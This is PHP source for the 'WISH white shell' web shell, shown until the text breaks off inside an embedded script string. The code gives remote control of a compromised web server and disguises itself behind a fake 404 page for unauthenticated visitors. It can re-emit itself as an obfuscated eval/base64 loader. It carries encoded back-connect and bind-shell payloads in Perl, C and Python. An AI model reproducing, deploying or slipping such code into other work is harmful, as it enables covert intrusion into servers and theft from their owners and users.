<?php

############### CONFIG/CUSTOM AREA ###################

$dalam = TRUE;
if(file_exists('wish_pass.php'))
include 'wish_pass.php';

######################################################

error_reporting(0);
@set_time_limit(0);

$time_start = microtime(true);

if(!isset($CONFIG['PASS']))$CONFIG['PASS'] = '';
if(!isset($CONFIG['NAME']))$CONFIG['NAME'] = 'WISH';
if(!isset($CONFIG['SUBNAME']))$CONFIG['SUBNAME'] = 'white shell';
if(!isset($CONFIG['SCRIPT']))$CONFIG['SCRIPT'] = 'shell';
if(!isset($CONFIG['COOKIE']))$CONFIG['COOKIE'] = 'wish_id';
if(!isset($CONFIG['LOGIN_TIME']))$CONFIG['LOGIN_TIME'] = false;
if(!isset($CONFIG['FORM']))$CONFIG['FORM'] = false;
$s_title = $CONFIG['NAME']." - ".$CONFIG['SUBNAME'].' @ '.$_SERVER['SERVER_NAME'];
$CONFIG['VER'] = '1.5.3b';

ob_clean();

session_name($CONFIG['COOKIE']);
session_set_cookie_params($CONFIG['LOGIN_TIME']);
$s_auth = false;

function get_ip_address(){
	$temp = array();
	foreach (array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
		if (array_key_exists($key, $_SERVER) === true){
			foreach (explode(',', $_SERVER[$key]) as $ip){
				if (filter_var($ip, FILTER_VALIDATE_IP) !== false){
					$temp[$key] = $ip;
				}
			}
		}
	}
	return $temp;
}

if(strlen(trim($CONFIG['PASS']))>0){
	if(isset($_COOKIE[$CONFIG['COOKIE']])){
		session_start();
		if(isset($_SESSION['PASS']) and isset($_SESSION['IP']) and
		$CONFIG['PASS']==$_SESSION['PASS'] and get_ip_address()==$_SESSION['IP'])
			$s_auth = true;
		else{
			$params = session_get_cookie_params();
			setcookie(session_name(), '', 1,$params["path"]);
			header("Location: ".$_SERVER['PHP_SELF']);
		}
	}
	if(isset($_REQUEST['login'])){
		$login = md5(trim($_REQUEST['login']));
		if(trim($CONFIG['PASS']) == $login){
			session_id(md5(uniqid()));
			session_start();
			$_SESSION['PASS'] = $login;
			$_SESSION['IP'] = get_ip_address();
		}
		header("Location: ".$_SERVER['PHP_SELF']);
		exit;
	}
	if(isset($_REQUEST['logout'])){
		session_start();
		session_unset();
		$params = session_get_cookie_params();
		setcookie(session_name(), '', 1,$params["path"]);
		session_destroy();
		header("Location: ".$_SERVER['PHP_SELF']);
		exit;
	}
} else {
	session_start();
	$s_auth = true; 
}

if(!isset($_SERVER['HTTP_USER_AGENT']) && isset($_GET['encode'])){
	echo "if(isset(\$_REQUEST['login'])||isset(\$_COOKIE['".$CONFIG['COOKIE']."']))eval(gzinflate(base64_decode('".base64_encode(gzdeflate(ltrim(file_get_contents(__FILE__),'<?php')))."')));";
	exit;
}

if(!$s_auth) {
	$magic='w34v68bg95ck1dtr';
	$url = explode("?",$_SERVER['REQUEST_URI']);
	$url[0] = $url[0].$magic;
	$url = implode('?',$url);
	
	$req="GET ".$url." HTTP/1.0\r\n";
	$req.="Host: ".$_SERVER['SERVER_NAME']."\r\n";
	$req.="Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n";
	$req.="Connection: close\r\n\r\n";

	$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	socket_connect($sock, $_SERVER['SERVER_ADDR'], 80);
	socket_write($sock, $req, strlen($req));
	$buff=socket_read($sock, 16384);
	socket_close($sock);

	$buff=preg_replace('/'.$magic.'/', '', $buff);
	$offset=strpos($buff, '<');
	$buff=substr($buff, $offset, strlen($buff)-$offset);

	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");

	echo $buff;
	if($CONFIG['FORM']){
		?><form method=post style="margin:auto;width:120px;"><input type=password name=login style="background:transparent;border:0;outline:0;width:100px;margin:0px;" /><input type=submit value="" style="background:transparent;border:0;outline:0;width:20px;margin:0px;" /></form><?php
	}
	exit;
}

ob_start("ob_gzhandler");

$xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
$xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
$xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
$xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
$xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
$wmulti_c = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoIjkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBTwitSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51nzYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRYHN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1zZapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg28f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKXNo4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppwkeXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5EGrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngXEYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+cNDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw78OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKlPE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8ykpox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivewlfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyKIKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxGy8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS+Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJgZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb9D4hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuytBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4/2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf";

$style = "lVfNbuM2ED4nQN6BwKJAC9iG5CDeQIs99B2KXoocKJG2iFCkQNEbu0bevfwTOZRo7PaS2CTn/5tvxq0kV3R7enw4SqG3E/uXNqiux8u3+eiIB8avDfoL93LAG/Q3VQQL8+FPxTA3zz6fHp8esVWh6UVvCe2kwppJ0SAhBbWKOsmlaghW74qSKNL08gdVt3gP7nYDZsLefDCi++a1qrxHA1YnJpq9+YrwWcv4vqeYULVBu9bEY/4dpdRet7Vx5PIjeUPYNHJsQtK45fQbimbqqvotarSKbslkbU0GL0ZMCBOnrZajO7dnrVTGAX9kXn6pqgpNkrMUUnLJq8zEg8rm5Re1GX2dHK+KnXqd8oRcBGgV47aj3JbKVwhzdhJNR4VxJ3rH6dEpCpad4rVtYCf3e5/S4/VFz2wMFRA9HNYhoz0Uta6YEkYNd2LpqffRF+3BlFmzDvMQHjJ2E5qoOINabuu8jtZgyHx6jwzEw4cE1J8g3CUr18KZleNsMs2lr8Z9fR1pE8Syd8Zg/DiNWMDQWy6799QA3uN9Bj1XLFen2YslqLJw66yjHNLmtISjVmotB3/6YM3g7v2k5FmQ5svxeExRl4L2KQMhhYM5MKDspOgVKAuqYaB1tawNZ7uJctppSoCNdDabgVry1vIAX0DxFfDeh4dXKzmJZ44e631Q9H/ysePyJM8aYdBjDg8NMWl2xJd5Fi5zBolhjrijt7ILdxAT+AvApSqkYwUhb3dUchgBO7h33u8V1vapVLYIQPYnWX1OgkyMZw0kPXN8TeTsiADQXuSUBbWn+ExlOB4nM9wmOmLTvfDS5tP6juoiGccJAieO7pcFCInIYVxIiya31cXsSei5dX69pEpMBCxzm9KWnyOjsOG0ghmClOMSvEG+XTbIshpWFCPAkcGvwXSPT/I+zeDLNpuXMyrQmoFyWlwFvYav6RHOBG1SzJlv0Zvn6I05SpMgZVmOlqDRArTAO1R04NMyXdwnkEsUyEoWRZWl8x9L7N+7nnbvrby8bcChwoTJtzyAknB7NtUXmeh0bgem31Cp5DNxJqVfq/sE1p3VZGsxSgYH/9p8EWNFkl4qCM4WFRTbY960LvfLlC99y5Uj6ugkoWiDRkWznS907D0V2UhoypscwVMPeK7QqPmD1B6HecYuvgLIxqZycVjgGbMAtNBOebZbWq+zP+sRns3PnhEKVwvIC5NWUjjuWG7sJUg5kV7d1jnLx5aagkmwfbp5U5pXToTjlnLQdqFOixXPb3gPptBYN3bEp1zH/fSXRrkPZF9Oe5rPC9TMlIAq9Bpmq49X4IGa3dF0gwtaYTEdpRoaJbWZO79v6+fd857Q0x9QSw5MWDCr7pa5nZA/GwEhwT126pSZe7ciaRen2o51UszbsrRjUV+bavdSRYyCN6nP55f1Sk9j6mtHMckV7l8C17p1X4ffRSsGmFkneH7wSZrp/pDPfCbs5NjGxcdDeFYx7zmGis/TPIBKP4fKKEMmLDMxUPAWUNw91sp2QfT5Hw==";

$icons = array(
	'favicon' => "AZkCZv2JUE5HDQoaCgAAAA1JSERSAAAAIAAAACAIBgAAAHN6evQAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAACO0lEQVR42sxX3XGCQBDmmDzkkaQC7YBUEKkg2EEswQqcVGAJ2IGkAkkF0IE0EOEteSO7mY+Z9eSOQ3CSm1k54dif73a/5TyPxv3jQ0iyJ2kgPA+9iQbpikmOQj/P46ZpPAVDB5JAe68mib5PVTHWOF32hsdLn342MJ6RzCEZ7m0mAGBre8YINPgzp2hLeD2jy5HndE+NiJ6DqGxrfO+PBzuQYp5w5Ig+wb10jHJCj/OotCwpb5qE2ALWHRqTEAYiLdp0YuOFhgTPl6Q/VQOV8va8kjxDcSDQYiMfJDv8l8YjbMfFUI6GFyjJhaOvNZyzGudx5wAjJ2Qsbu8QaaaVLTv3grWBgPrqPQw1+kxg6MxBOHm2TRqtHwfTOri7EgoWLtyub5tYU5mcUD3cnSFba1du58y2lOGTXllKh11wwo4WrzocZIqemYiF3pl3vJOgei64RWne5lDOCRZdw+2m3kHv5kCiBBJ1Vy9oob5Irlv2AsnbKzjBnu51J1y43RB9Ap21nlO+ZqCl5Rp1fehAYm1xYN1Rpjn2v03SwtqONSfY61yWIbJ8aeJ2jT1zETknXzYpEZn6BdY6EZFyoOKtgLDtlO89VCxpe23rBS4OHASMrpXBUL+5QK46DP5me0c/j+BAbztukXEZStDrVjBcKZKwt6W65BPaeSy2kREqVA+3T2Xc+Mnn93y3B2OMY1jPHfJcMIjbByBgPXf8i3PBYG4fOKznDjXkA+MmSfj1eXLi9hGnI+u540eAAQAH901barTF0AAAAABJRU5ErkJggg==",
	'pencil' => "ATIBzf6JUE5HDQoaCgAAAA1JSERSAAAAIAAAACAIBgAAAHN6evQAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA1ElEQVR42sTX2w3CMAyF4aTqAIzCxh6FERjJ5IFWhSaNY5+TRvILF/0fbiUgqWrahnQeZd5lpPosGbDF9TsyE/AfryNIgFb8jCAAevFfBBhgje+IBbz2V5nn0LtAGxj95NBL4I8DALF4EBCPBwCYuBOAizsA2PggAB8fAHDiRgAvbgBw4x0AP34BmBMHAsT9NXYEOBHi6eytyoPi+mkFBKgRIZFN9wA9hEQvtQXQQgjiXrMCYnc4CABBtABr5YU5TTxLuvmcNpBzpvxLbW329g18BBgAGpJ550af4JsAAAAASUVORK5CYII=",
	'home' => "6wzwc+flkuJiYGDg9fRwCQLSCiDMwQYki6uqvgApyRLXiJLg/LSS8sSiVAbHlPykVAXP3MT01KDUxJTKwpOpNkBFUzxdHEMqbr2ZdpGzwYDHRbqQwb1E5O4B3lLmuwvYFBNYt15Tabpz8O+Ubd+rtlwQOHVlg/W3M3I3cwsu2VnI5XAVieZwfVKJEFVRj2Aqer6SPXvN5dsPztqtEp3WEHHvmYzA9O81XE5Oil2F0sbCgqqVotVJ/AfjbasV7Qqdnt1g8GSeD/IAFCzY93vz332NoQ2MDDcPTvr+6qcgyH0Mnq5+LuucEpoA"
);

$jscripts = array(
	'sortable' => "3VrvctvGEf/OpzixqkiGJCg6SWciilIsW5lo6jidWtN8oGjNAThSsECAAY6i1VgznT5GP7Zf+xTJm/RJurv3BwcQpKU07WQ6Y0vA3f753e7e7t5BdzxjubzIL87ZmA0++TIIrtNk78tPBjMe52LUyNNMSu7HAqZ/aLAoieQRm62SQEZp0u7Q2Iy1eTZfLUQicy/gcSyEF6aJ6LBMyFWWjBqsdh5EymwFSkjEtYwWIuuwIBY8u0ikyO54bEZHTBHthWlAgrwgE1yK81jgG/vwgRVTcyH1eH52f8nnr/nCxWKX5L18fnl+/Uda+dv2VXgVnnYmV4Mrrz+tvNFr55R+7g9AxizNznlw096ps90iNa1Or7AYjVizKRhBzPMcGbwclg5SB1c+gsTJK3/QYXtj1h92HOALfiveaAotEkA90I9eA2zlEhzt1r4F+Y3gYavjxSKZyxs2HrND4oNxMFe9FyzXiOg8vlyKJHxxE8Wh1pWl63xyOCUCGoiSXGTyTIA9YSE3oqeGZ1GWS2KkJblw5degAvEkqzjusNIge8SKQP1oQx4BM2sFaw9tuLDBgAU8aUkWpEvB1hEQyHXKUJjIGPKhvfEVni2EQiro8wIRx7mKGta+gx0XjQ9HLDrWXFoxjHS71jl7enISTZ0AWXBZxAepuk5SfMY4AV6Em99GS7B/lAPkGEIBOADXY8W1J7z/58P+F9NuB2VqW6EQFJ/eiSyLQowBHJoMpyPjHtJzcMDk/VKksyJYJ018vG52De8UvdcyMdmiFTvoCij4ZMhA4Q6JGCRMQMJ6sixvvhJ5fgmYVTz0Ih1xtVLAoKtFEiWheA9CotEWMumn4X0RC2dpGIlcBV4oeHLNw/D8DjdMwd1rBnEU3DadVOFsVHDm1ixRrE+Ebrb4wc10mQBT5UJJqgBV29XVgNDLKjOxjHkAu6iqsQXpZmPwWqtrWdGZWICzVCqoyZln9xdhVfZsHYKhW52OTtkgE953JJ98Cfu0TO1FyNAsC1ZTzQphkojs68tvXmFwqHp4yloHiZ8vj2cpVJgZLH/cXAsfUM3z5snnxwMcP2mxI003OvjN+2efn302aplVuwmw0IUQbTF6eKKHjWn/9562Tq3z+H/kaWWWwtPK84/1tKKu9bSaalYIn+rp323z9Pl2TytdVU9Lp0wg15JnsJ7XaSiclsIQeQFKw8ncSQpYSmxewBcvAQrMX5hVh7oE8ASyIRmrwYjIdXh54DEOb5Gxf7YgI+BBtyj1Pn5cNtD1yLExrNjxbmHSUiS6PkEc9QnlcWHqQNAbWkPQqWQHBJMAEMLGVuxCVWQbtvu/3BPp+ppnGccaOcGqCHXV7InaYqt48k0aSmvUZ7nt1Ttsr94dO00dvOreyuqe2CdNM0U0TmMg5AWa5VK8l23q5N7pTm4CyKbQ1OvBqQrtQhzKqOZft/9AE4CN/C3LqV9JCWqxHOmX7Fys7t0UmjO967DtiIUUBUZ7WlD/6MxgO6HqgaHHlCtspZmVWyjqxni8vOE1PW61B/JKXjEdrwQjl9sy1/q1MqiTNe4AdFOzMUkWlMZWq2igYMg0u2/7p5Of/vrjP/Z/+vu//vK3H/85PZ1chT1v2v3t6T710CZnV1eYwL7LokBZbZnmeQj7D31YCN84WnaUfkNN0ulwA3yQJ3IBB107qx2WiyClrb5J8MwuUgk5YcNnOxCH4WJRtMaUtJTsj/AtFmFYaqm3Od0ocP45EmeJPY+67nTCC2uX6v95fpEsVxK3eFufIHCy9ixXPT8cHDS2E7dbEQq2R1naexQTjhZ04QvIZ3iVgJGzgqQzixJIv3ii2bPoXJtVGW39G7y9yrsf4P/+YN5jtvRZH7iKI2OU